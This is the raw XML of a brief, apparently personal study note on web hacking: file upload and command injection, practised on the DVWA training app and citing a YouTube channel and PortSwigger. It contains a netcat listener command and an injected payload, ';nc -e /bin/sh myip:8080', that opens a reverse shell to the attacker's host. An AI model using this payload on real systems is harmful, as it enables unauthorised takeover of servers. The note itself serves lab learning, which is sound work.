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36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN" w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="auto"/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>File Upload / File Intrusion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Ref: </w:t>
      </w:r>
      <w:hyperlink r:id="rId2">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
            <w:color w:val="0563C1" w:themeColor="hyperlink"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>S</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1" w:themeColor="hyperlink"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>pin the hack YouTube channel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i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Create server to listen</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr/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n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>c -vv -l -p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the server is executing the commands then following injection will make us take over entire server</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t>;nc -e /bin/sh myip:8080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DVWA: Damn vulnerability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IN" w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>Web App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>The impact of file upload vulnerability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Which aspect of the file the website fails to validate properly, whether that be its size, type, contents, and so on. </w:t>
      </w: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>(denial of service or full take over)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What restrictions are imposed on the file once it has been successfully uploaded. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial;Courier;sans-serif" w:hAnsi="Arial;Courier;sans-serif"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>(if the file is allowed to be executed)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr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Courier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rtswigger.net/web-security/cross-site-scripting/exploit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LibreOffice/6.4.7.2$Linux_X86_64 LibreOffice_project/40$Build-2</Application>
  <Pages>1</Pages>
  <Words>104</Words>
  <Characters>486</Characters>
  <CharactersWithSpaces>581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2023-07-25T23:49:55Z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